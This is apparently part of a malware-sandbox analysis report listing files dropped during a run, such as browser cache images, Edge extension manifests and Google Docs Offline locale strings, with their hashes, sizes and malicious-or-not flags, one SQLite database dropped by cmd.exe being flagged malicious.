                                SSDEEP:3072:mb+ov3qnqVnYzCrDR9M9zjyhPVFQ/ucMyXA6nh:maovwqVY2rDR9M5lucfh
                                MD5:3D6A38C410364DEF27F3534CAEA198EA
                                SHA1:992BD3758B724BD1BD3B8F43389444C57466F539
                                SHA-256:37FC215049CB19F2AFEF689AE322296C9EEBD3976BFF15EEF1D0C222123B3BFC
                                SHA-512:F9DB1184405D6ED8CC04C776F90F2FBC4EC3A8E4C3901A770A8477A9B43753A5E824EF06096B86E86E76E659A8A4750BC65380E015789405E73D09FD81770794
                                Malicious:false
                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                File Type:Unicode text, UTF-8 text, with very long lines (62058), with no line terminators
                                Category:dropped
                                Size (bytes):232444
                                Entropy (8bit):5.757159208987851
                                Encrypted:false
                                SSDEEP:1536:r7c/ckbS2b/EhrWjhw3dJqWnQHdzJg7hJ5BjHnatGJNyWVzskx+jlqAGu/oNxKIk:fvkbPjg9MmyWsMUd/sJb1rNA
                                MD5:33B429428459E94553950D15F1E4E9B8
                                SHA1:312D4C60431209065D2FCC1DC62E78673806921B
                                SHA-256:F471B3C803809A06728BAD76BB0CB67A38C35972492817DF98FC23CC00C101B8
                                SHA-512:09BDCA9519F17FD677E4E60255CC1428884F94CFBBE456B0B3F3B74325A78DF4B7BEDCC745682FAC65CE999498B4CA37BF1E03EDC054A9C40935F9E713BFCC61
                                Malicious:false
                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                File Type:ASCII text, with very long lines (65448)
                                Category:dropped
                                Size (bytes):94620
                                Entropy (8bit):5.4076498069548435
                                Encrypted:false
                                SSDEEP:768:wYqLAnwLD2AFtbo2k3DG5wsxWkNcdJ/r3LLnt9+tISGtOMHiYnEvlwXLnt+79VlU:w7L37ivM1WkNWnt4KClwXLwsoxsE+
                                MD5:095130BBC3EEC571FCE0F8B59513E250
                                SHA1:391DFF8E9455FA291AF53500A60BC955B4E586A8
                                SHA-256:F834D3999811C38EACD96A27AFC0B913B38E84BB68D14D3F6DDF815C7D1ECB3D
                                SHA-512:35101C2CD26FFF76719977B4A99D769A0713B23BF874E43649F4EB6699E0A01BA74435A870C7C02B56DA1C928417B66EEE019B9B1ED3752F06C95CA8770D3E1F
                                Malicious:false
                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x157, components 3
                                Category:dropped
                                Size (bytes):15430
                                Entropy (8bit):7.9492071277140335
                                Encrypted:false
                                SSDEEP:384:SDtiMSvtlGKGbX/dcG88ZLswKzxUS3cpUqxoyliAuUwO:SVytotadELs31UHjUUB
                                MD5:AE5632ACCE5AB21B9A5E1D98963F93E8
                                SHA1:7D30C1416D032E997D2F77F601B7F69905CCE26D
                                SHA-256:D5CE192FC779DC8C5BAA347F0EFA27D8705B4739F78DB2B79F6ADA49D8877A99
                                SHA-512:BD6E94C383960C97F7A0B4BAB09390CBC2DDDED17E9FD5DFEE8219355336C23C4FACED8D71C6C16F2A0A6A4B06BACDF79F80CCA87FAE25C09E298258C05B1162
                                Malicious:false
                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x157, components 3
                                Category:dropped
                                Size (bytes):10202
                                Entropy (8bit):7.944773864880997
                                Encrypted:false
                                SSDEEP:192:SULV1RcZErFrTMBr2WZjRZZrVNRjx8rIAzQGau6tHFxCk+4AVu:SUR8mBWxRZZrVLx8sUpoX7+4AVu
                                MD5:A6E3F37D1F7538046509FD223769E37A
                                SHA1:026089E1D94BECBD38ADC7C9E603E6CCAB18AA4B
                                SHA-256:C041600210A107FDAF606A522DDA031566806BDDA3FC8DC572B0EBA913B2FE7F
                                SHA-512:BC3806C6C2CD78146BBADB9FFD0B5EDF33EBD89F06A82D006042EA63242752BFB25085E6B9DBEAA3D42ED405873A096E241113887F197B151F07DB583400FF29
                                Malicious:false
                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                File Type:Unicode text, UTF-8 text, with very long lines (44421), with NEL line terminators
                                Category:dropped
                                Size (bytes):196564
                                Entropy (8bit):5.416918453049597
                                Encrypted:false
                                SSDEEP:3072:5yggyMjcPJF7iol0cQtK7bKXZ7x7/3DwLqsop:5yggUJN3CE7cZ7MnQ
                                MD5:87B6340D5C378650AB6B6DBFC2FCC200
                                SHA1:42625DD447DD664F0078D831A020BED9A71A92A1
                                SHA-256:27F89E7501CE8BF61E542F918284E6DDA03C31ADE11BD4B2174AE34D50EAABB3
                                SHA-512:1BE5C0AD1109FF789A1D1A7D1145C1421E756A26D7350F512C0434DFF1422477EA36DA6BE886556CAD37B75ACA5942A10E6E71761A87263151419451487E5EE6
                                Malicious:false
                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                File Type:PNG image data, 96 x 96, 8-bit/color RGB, non-interlaced
                                Category:dropped
                                Size (bytes):1287
                                Entropy (8bit):7.753286328828527
                                Encrypted:false
                                SSDEEP:24:Qkmkb13K52UTcyiUJlRq85hww6qJyPGbh166BaK23P:Qkm613KsE+oLDBrJyPGbD66d23P
                                MD5:9B8059391E9315D157357A18A6A0191B
                                SHA1:C466111C02D867C05CD522F2F362CFC23FA22B9C
                                SHA-256:379BC8D28440A12EA8A540917610C7B6A2B865CDA7275285FF922D69CF46B5E7
                                SHA-512:CB19000C7425C1CF8DDA9A8D10DC220D4961D34AD9B837E4DABF2C649D57223F0497D344671782E4F4782BDAD82B06CE702E27D67F2176168DA619985BAC5848
                                Malicious:false
                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                Category:dropped
                                Size (bytes):436
                                Entropy (8bit):7.18858527233746
                                Encrypted:false
                                SSDEEP:12:6v/78/vX/5q+5UqmyzAn0TBlJPgk/AwL7jCCDsoQ:NX/5q2XvTBt9L7ZDG
                                MD5:5D148DE03EB9EB2C6297C4914C674EB8
                                SHA1:C5B7CC2436A49E5C0A92E05EE18B0FBE75D61FDF
                                SHA-256:BEA40AB0237ED221B313DEE3EF74594B8369C5B8F52474D87EF0BB6F0D40C997
                                SHA-512:9841B2B22E883ED8DB5CF79A4E04BB61723DE82AC1085BEA755220A2EE5A43D8C2EBECCC99000A4E5774F867AE99BF36BAD8C96A57A838AE90A83C05C7DEB95F
                                Malicious:false
                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                File Type:PNG image data, 96 x 96, 8-bit/color RGBA, non-interlaced
                                Category:dropped
                                Size (bytes):1214
                                Entropy (8bit):7.599946746969644
                                Encrypted:false
                                SSDEEP:24:C/6yU0JRXs1C1zE9hrbmbvTiT9je3iMUEFCONRXTQUBwFaG7:C/6yU0XXu9xRje3FCOfDQCwFak
                                MD5:840EDBF110A8FF1F0D9CA580AC5EEAC3
                                SHA1:322B7EC2E8848CE0701323C95EBE68CBC911987F
                                SHA-256:278AF8DB05B358D4A77C18906379F458402D3E0B4A905A51A5C8A05CA5A7FA6F
                                SHA-512:A2E378275DFFAED9996262AB82F13EA701A9CA75E50EFEEF1DC09398D5E0B78C64ED12AE0BA7BB579E71AF70ED1D46F54E86F3B93189DC520A8B221539043DFD
                                Malicious:false
                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x157, components 3
                                Category:dropped
                                Size (bytes):16384
                                Entropy (8bit):7.253800605824277
                                Encrypted:false
                                SSDEEP:384:fSf1VoejXU4OVmxqt9/5QI+xKg7kPDV6l:fSdVoeo4OVmpI+xKZx6l
                                MD5:FD7CD7851CE0AE3B1952F97FA2BDB16B
                                SHA1:E2A9BF5B5D9D8185380782C471E7C9E064504A54
                                SHA-256:7A17395DF16D2E2E80CE65C1974D8BBF64EB8A979E5FA411B0BCB9B30B4E04BC
                                SHA-512:55841E2433DB36052E80B5AB62D5B132A69FC4FE1D91D827B468A2939262A76ECB9010870C9C091F6AFE856F0B371574F3D4A10C5F077A463B50259ECFF040F3
                                Malicious:false
                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                File Type:PNG image data, 60 x 32, 8-bit/color RGBA, non-interlaced
                                Category:dropped
                                Size (bytes):533
                                Entropy (8bit):7.415663553371965
                                Encrypted:false
                                SSDEEP:12:6v/7Ya7/6Ts/o7hJW8/t8oX8qUkUGGVIXC/zoZ3VYZwWSVR:E/6pzWK+q/UGGMC/zw3oGVR
                                MD5:B6162D100379E7F4EF709BA5C26D1BA8
                                SHA1:AEA4244C56F00AA26064134863157A6EE9D7ABB9
                                SHA-256:DCA74022BEBB4F12F8EFADD226C9413CAFFF9193420D604DE8A398642172AACA
                                SHA-512:CC64207C45F85255F34A157C9370A46EBD4A2B3A674E639838EF7582FD93D68F91A275C577E2FC9A46674EC765D8CC43A5BE28B281FCD5006D38D0C6F02E2058
                                Malicious:false
                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                File Type:PNG image data, 7 x 13, 8-bit/color RGBA, non-interlaced
                                Category:dropped
                                Size (bytes):197
                                Entropy (8bit):5.986656121330302
                                Encrypted:false
                                SSDEEP:3:yionv//thPlyyta2/uDlhlp8Lts7CX9/2yx24lSXqU3hjg/BFCb0cCHxlbVdMaW9:6v/lhP1b/6TsR/R0Zjgz89CXVdMndp
                                MD5:34760615AB0C180EB4B48739297FD0F2
                                SHA1:789438D09CC27A08879B1A9686C82527270E7C24
                                SHA-256:360C33D59E7358579601909D4CE91F1BCABF9E07BEB8F69D50C226D7D8F91260
                                SHA-512:1CE7E574D45D123C6B52119907E74D71B842F1CC380D79AEF876FDBC9FDB663F385BB4191650813D2E66EFE24265FD36EC944AF95F372C0413EDCF11361CA666
                                Malicious:false
                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x157, components 3
                                Category:dropped
                                Size (bytes):12347
                                Entropy (8bit):7.960292048518906
                                Encrypted:false
                                SSDEEP:192:SLg3Wnh/hzjvu3aWFHNjWTld1ZM82IAzb4eb6GWdjNh4M7QHhiiC:Ss3WnFhvvaFtjwlhM8K4eYeiQ2
                                MD5:C687C0BEF3C339F9EFC56F89C7BA7C52
                                SHA1:93B06190A67025924EA4F305F3D05718B06AD4C4
                                SHA-256:38C2012AA5372E17CA49C4719E1ADB88455666353063C59E91594A19682A6663
                                SHA-512:1B26C5D737D01E914352543F1FAEE5229085EDA80F0CD62EAB386C4ADB4B4CC94D3C5077C602477679BDE117EBB4F7BF511B95B1DEFF7A77D6A3D09BAD378C7D
                                Malicious:false
                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x157, components 3
                                Category:dropped
                                Size (bytes):17124
                                Entropy (8bit):7.949943883996383
                                Encrypted:false
                                SSDEEP:384:SNbLAYJZ5YpLgMaLtBnIk5Y+wNO+Vq/V1F/9YQGZGC:S17hYLgMPoONO+I/B9YNV
                                MD5:768C3AA9CEC3F9472CD150608CAB485E
                                SHA1:EA06EAEE8912735D63C682F7638EDDE2E431F7C8
                                SHA-256:281BA99CD8A386485CBD919CDCAD0ECFA2E218030871716E29E3DD6BC5570B1F
                                SHA-512:56864A34150DFF880DFD5621D49552147A7DE09DF08BDAC79C01065F974EFA14A0D422FFB66F60F866C3D4F9B1AA595573F5EDDF59B15DBD85F6DCCD57B4ECA3
                                Malicious:false
                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x157, components 3
                                Category:dropped
                                Size (bytes):25539
                                Entropy (8bit):7.965375269158827
                                Encrypted:false
                                SSDEEP:384:SN7BKJeUOgLUy5ZoeVrQ+qP0O39yROY8atvSLpfnQTfJC9PbSZMimlQwI1T6RnC:S3KQUVYyIeVrYP0e9fwvSQTQbizVgC
                                MD5:E1156678D28FE780290C3A910E5893FD
                                SHA1:FDA56E6EB3824D274388F3BAC226FBF698E0A79A
                                SHA-256:A30AC57B0A6EC571B7EEFFECC001F849CA3B41B495D7276453FE7A9331E22C99
                                SHA-512:D67B75B4E5BDB1237DF29407427F432138508958E667A8696980EAB387BADDA9ECB7FBCCD145ACB996A1AB35734C0887D393CADBD78C126546B46D27DC438BD4
                                Malicious:false
                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):49120
                                Entropy (8bit):0.0017331682157558962
                                Encrypted:false
                                SSDEEP:3:Ztt:T
                                MD5:0392ADA071EB68355BED625D8F9695F3
                                SHA1:777253141235B6C6AC92E17E297A1482E82252CC
                                SHA-256:B1313DD95EAF63F33F86F72F09E2ECD700D11159A8693210C37470FCB84038F7
                                SHA-512:EF659EEFCAB16221783ECB258D19801A1FF063478698CF4FCE3C9F98059CA7B1D060B0449E6FD89D3B70439D9735FA1D50088568FF46C9927DE45808250AEC2E
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:very short file (no magic)
                                Category:dropped
                                Size (bytes):1
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:L:L
                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                Malicious:false
                                Preview:.
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:Google Chrome extension, version 3
                                Category:dropped
                                Size (bytes):101423
                                Entropy (8bit):7.716355979337822
                                Encrypted:false
                                SSDEEP:3072:bBOJCAanDR3nNsalT7oxqnjyx+RjGj3XH6pN6n:9OJ78DRdsQgxqjQ+LEn
                                MD5:6457B577795F5C8949055DA3A8D3AB2E
                                SHA1:515B61672FE5F3B2A78B7A64D7B83FADAF43E4E0
                                SHA-256:52434403B00CD4AD818162921EB958AB318F2EAED1041CC0EB7216F97A63E950
                                SHA-512:DA6F36047A99BFB7D3E942BC1AD5F935EF9913899765A39E0B29CB117AB706948AB38AD5FA468507AECFB39612DA9C3C0E18C707496AF498390B00184CE61622
                                Malicious:false
                                Process:C:\Windows\SysWOW64\cmd.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                Category:dropped
                                Size (bytes):40960
                                Entropy (8bit):0.8553638852307782
                                Encrypted:false
                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                MD5:28222628A3465C5F0D4B28F70F97F482
                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                Malicious:true
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:Google Chrome extension, version 3
                                Category:dropped
                                Size (bytes):11185
                                Entropy (8bit):7.951995436832936
                                Encrypted:false
                                SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):353
                                Entropy (8bit):5.380128229721059
                                Encrypted:false
                                SSDEEP:6:YEcPgr1ZsP56s/ucPgr1WknAhRDTKpJvxQJjDrwv/ucPgr1TFkRGcp56s/C:YNw056s/bwWknAh6dx0Dkv/bwKwcp56R
                                MD5:DF29889AE904F69E9B4C35D1ABF308B4
                                SHA1:F68E5C4C87650C5B6C84E660126EF3F449668F73
                                SHA-256:96583C375A11D9CD4831F2ACBC49C2514310405B80BF1C5D67B55D3FA03DE668
                                SHA-512:C9C12A8E4645B7780565C88C458A7838469A5990EB15D8A7CBAF186908952E464ACD16F00971FE9CEC3965F20FE2684C10AA919695C435281F68F63B0E16B206
                                Malicious:false
                                Preview:{"logTime": "0527/064243", "correlationVector":"Pp6vK3czpGcivFdy3gftyX","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "0527/064243", "correlationVector":"CF3ABA04F33D471F806C201C2C50AB6C","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "0527/064243", "correlationVector":"zAvZ1Ve+Lk5FaTZ3hfzK3d","action":"EXTENSION_UPDATER", "result":""}.
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:very short file (no magic)
                                Category:dropped
                                Size (bytes):1
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:L:L
                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                Malicious:false
                                Preview:.
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):1753
                                Entropy (8bit):5.8889033066924155
                                Encrypted:false
                                SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                MD5:738E757B92939B24CDBBD0EFC2601315
                                SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                Malicious:false
                                Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "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",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                Category:dropped
                                Size (bytes):9815
                                Entropy (8bit):6.1716321262973315
                                Encrypted:false
                                SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                Category:dropped
                                Size (bytes):10388
                                Entropy (8bit):6.174387413738973
                                Encrypted:false
                                SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):962
                                Entropy (8bit):5.698567446030411
                                Encrypted:false
                                SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                Malicious:false
                                Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:Google Chrome extension, version 3
                                Category:dropped
                                Size (bytes):11185
                                Entropy (8bit):7.951995436832936
                                Encrypted:false
                                SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:Google Chrome extension, version 3
                                Category:dropped
                                Size (bytes):101423
                                Entropy (8bit):7.716355979337822
                                Encrypted:false
                                SSDEEP:3072:bBOJCAanDR3nNsalT7oxqnjyx+RjGj3XH6pN6n:9OJ78DRdsQgxqjQ+LEn
                                MD5:6457B577795F5C8949055DA3A8D3AB2E
                                SHA1:515B61672FE5F3B2A78B7A64D7B83FADAF43E4E0
                                SHA-256:52434403B00CD4AD818162921EB958AB318F2EAED1041CC0EB7216F97A63E950
                                SHA-512:DA6F36047A99BFB7D3E942BC1AD5F935EF9913899765A39E0B29CB117AB706948AB38AD5FA468507AECFB39612DA9C3C0E18C707496AF498390B00184CE61622
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                Category:dropped
                                Size (bytes):4982
                                Entropy (8bit):7.929761711048726
                                Encrypted:false
                                SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                MD5:913064ADAAA4C4FA2A9D011B66B33183
                                SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):908
                                Entropy (8bit):4.512512697156616
                                Encrypted:false
                                SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                MD5:12403EBCCE3AE8287A9E823C0256D205
                                SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):1285
                                Entropy (8bit):4.702209356847184
                                Encrypted:false
                                SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                SHA1:58979859B28513608626B563138097DC19236F1F
                                SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):1244
                                Entropy (8bit):4.5533961615623735
                                Encrypted:false
                                SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                Malicious:false
